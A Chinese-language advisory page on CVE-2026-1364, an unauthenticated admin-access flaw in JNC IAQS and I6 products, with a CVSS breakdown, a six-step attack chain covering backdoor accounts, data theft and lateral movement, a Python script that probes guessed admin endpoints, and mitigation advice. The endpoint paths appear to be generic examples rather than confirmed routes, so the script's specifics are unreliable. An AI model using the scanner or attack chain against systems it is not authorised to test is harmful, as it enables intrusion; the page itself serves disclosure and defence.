CVE-2026-1364 JNC IAQS/I6 缺少认证远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-1364

漏洞类型

缺少认证

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

JNC IAQS, JNC I6

漏洞概述

CVE-2026-1364是JNC公司开发的IAQS和I6产品中存在的一个严重安全漏洞。该漏洞被分类为"缺少认证"（Missing Authentication），属于高危级别漏洞，CVSS评分高达9.8分（满分10分）。此漏洞允许未经身份验证的远程攻击者直接访问系统的管理功能，而无需提供任何有效的凭据。攻击者可以利用此漏洞在受影响的系统上执行任意操作，包括但不限于查看敏感数据、修改系统配置、上传恶意文件、执行系统命令等。由于该漏洞的利用无需任何用户交互，且攻击复杂度较低，因此对互联网上的所有暴露该服务的组织构成严重威胁。台湾CERT（TWGCERT）已经确认并报告了此漏洞，漏洞披露日期为2026年1月23日。建议受影响的用户立即采取缓解措施并关注厂商发布的安全更新。

技术细节

该漏洞存在于JNC IAQS和I6产品的身份验证机制中。系统未能对关键管理功能实施适当的访问控制检查，导致任何网络可达的客户端都可以直接调用原本需要认证才能访问的管理接口。攻击者可以通过构造特定的HTTP请求，直接访问如系统配置、数据管理、用户管理等高权限功能模块。由于系统后端缺乏有效的会话验证和权限检查，攻击请求会被直接执行。攻击者可以利用此漏洞执行以下操作：1）读取系统配置文件和敏感数据；2）修改系统参数和配置；3）上传或替换系统文件；4）执行操作系统命令；5）创建后门账户以维持持久化访问。攻击者通常通过扫描发现暴露的管理端口，然后使用自动化工具发送特制请求来利用此漏洞。由于该漏洞影响的是认证机制本身，因此传统的网络隔离措施无法完全防护，除非管理接口完全不可达。

攻击链分析

STEP 1

步骤1

信息收集：攻击者使用 Shodan、Censys 或 Nmap 等工具扫描互联网，识别暴露的 JNC IAQS/I6 管理接口

STEP 2

步骤2

漏洞验证：攻击者尝试访问管理端点（如 /admin/config、/api/admin/settings），确认无需认证即可访问

STEP 3

步骤3

权限提升：利用缺少认证的漏洞，直接调用高权限管理功能，如系统配置修改、用户管理等

STEP 4

步骤4

持久化：创建后门账户或上传恶意脚本，确保在漏洞修复后仍能维持访问

STEP 5

步骤5

数据窃取：下载敏感配置文件、用户数据、业务信息等机密内容

STEP 6

步骤6

横向移动：利用获取的系统权限和凭据，尝试渗透内网其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-1364 PoC - Missing Authentication in JNC IAQS/I6
# Target: JNC IAQS and I6 products
# Vulnerability: Missing Authentication for admin functionalities

def check_vulnerability(target_url):
    """
    Check if target is vulnerable to CVE-2026-1364
    """
    endpoints = [
        "/admin/config",
        "/admin/system",
        "/admin/users",
        "/api/admin/settings",
        "/api/system/command"
    ]
    
    print(f"[*] Scanning target: {target_url}")
    print(f"[*] CVE-2026-1364: Missing Authentication in JNC IAQS/I6\n")
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            # Send unauthenticated request
            response = requests.get(url, timeout=10, verify=False)
            
            # Check if we get admin access without authentication
            if response.status_code == 200:
                print(f"[+] VULNERABLE: {url}")
                print(f"    Status: {response.status_code}")
                print(f"    Response length: {len(response.text)} bytes")
                
                # Check for sensitive data exposure
                if "config" in response.text.lower() or "admin" in response.text.lower():
                    print(f"    [!] Sensitive data may be exposed")
            elif response.status_code == 401 or response.status_code == 403:
                print(f"[-] Protected: {url} (Auth required)")
            else:
                print(f"[*] Unknown: {url} (Status: {response.status_code})")
                
        except requests.exceptions.RequestException as e:
            print(f"[!] Error accessing {url}: {e}")
    
    print("\n[*] Scan complete")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-1364-poc.py <target_url>")
        print("Example: python cve-2026-1364-poc.py http://target.com")
        sys.exit(1)
    
    target = sys.argv[1]
    check_vulnerability(target)

影响范围

JNC IAQS 所有版本

JNC I6 所有版本

防御指南

临时缓解措施

在厂商发布正式补丁之前，建议采取以下临时缓解措施：1）立即将管理接口从互联网移除，仅允许通过 VPN 或内网访问；2）配置防火墙规则，限制对管理端口的访问，仅允许可信IP地址访问；3）启用现有的日志记录功能，监控所有管理接口的访问尝试；4）定期检查系统是否存在异常的配置文件修改或未知账户；5）考虑部署入侵检测系统（IDS）监控针对管理接口的可疑请求模式；6）如果业务允许，暂时禁用受影响的管理功能，直到应用安全更新。